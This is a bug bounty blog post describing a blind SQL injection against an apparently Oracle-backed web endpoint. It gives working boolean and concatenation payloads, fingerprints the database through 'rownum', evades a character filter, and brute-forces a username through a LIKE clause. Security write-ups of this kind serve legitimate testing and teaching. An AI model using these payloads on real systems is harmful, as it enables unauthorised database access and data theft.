Thursday, April 16, 2020

Tricky Oracle SQL Injection Situation

Recently I learnt few new stuff when solving SQL Injection found during pentest and also bugbounty. One of the new technique that seems new to me is the one that I learnt from my master, pokleyzz. This injection was found in a recent bugbounty program and the actual path/parameter were replaced.

The injection was found on the "idNumber" parameter of the following endpoint
/foo/?theName=YAP&idNumber=248001[here]
Common payloads were performed on this target and initially, I found the following payloads were working to identify TRUE/FALSE condition

/foo/?theName=YAP&idNumber=248001'+AND+'1'='1 TRUE
/foo/?theName=YAP&idNumber=248001'+AND+'2'='1 FALSE 

and also able to use pipe operator too

/foo/?theName=YAP&idNumber=248'||'001 TRUE
/foo/?theName=YAP&idNumber=24'||'8'||'001 TRUE
/foo/?theName=YAP&idNumber=24'||'X'||'001 FALSE

With these conditions, I was able to narrow down the database used by this application to Oracle, PosgreSQL, IBM DB2 or Informix.

At first, I thought this can be done using the same technique that I know:

See : https://blog.yappare.com/2012/04/advance-oracle-blind-sql-injection.html

However, the CASE() was not working. After few attempts, I stopped to figure out on using CASE(). Next, this technique was tried:

See: https://blog.yappare.com/2017/03/blind-sql-injection-in-erim-not-sure.html

No joy. Dead end. After almost two days of trying, I give up doing it myself and ask helps from few friends.
No luck. I tried my last option, pokleyzz. In just less than an hour, he showed me the technique that can be used.

/foo/?theName=YAP&idNumber=248'||<bruteforce any known SQL functions here>||'001

As a result, I found "rownum" was accepted and this indicates the DBMS is Oracle. To reconfirm, the following was queried:

/foo/?theName=YAP&idNumber=24800'||rownum||'

The above payload result in the website displayed list of "theName" product that starts with "idNumber" 24800

Interesting! Now how we can at least extract data from this injection? Another blocker was identified. It seems the application filtered/replaced the following characters
_ ( ) + . whitespaces
While I found this seems another dead end, pokleyzz showed another brilliant way to extract the data using the following payload:

 /foo/?theName=YAP&idNumber=248'||<bruteforce all column_name here>||'001 - We found few column names which one of it was "username"
Then final step was:

 /foo/?theName=YAP&idNumber=248001'and''||username||''like'<bruteforce-character>%
 I ran the Intruder on the above attacking point and voila, got the username 😼

As always, pokleyzz is the best master I have. 💻

Bye.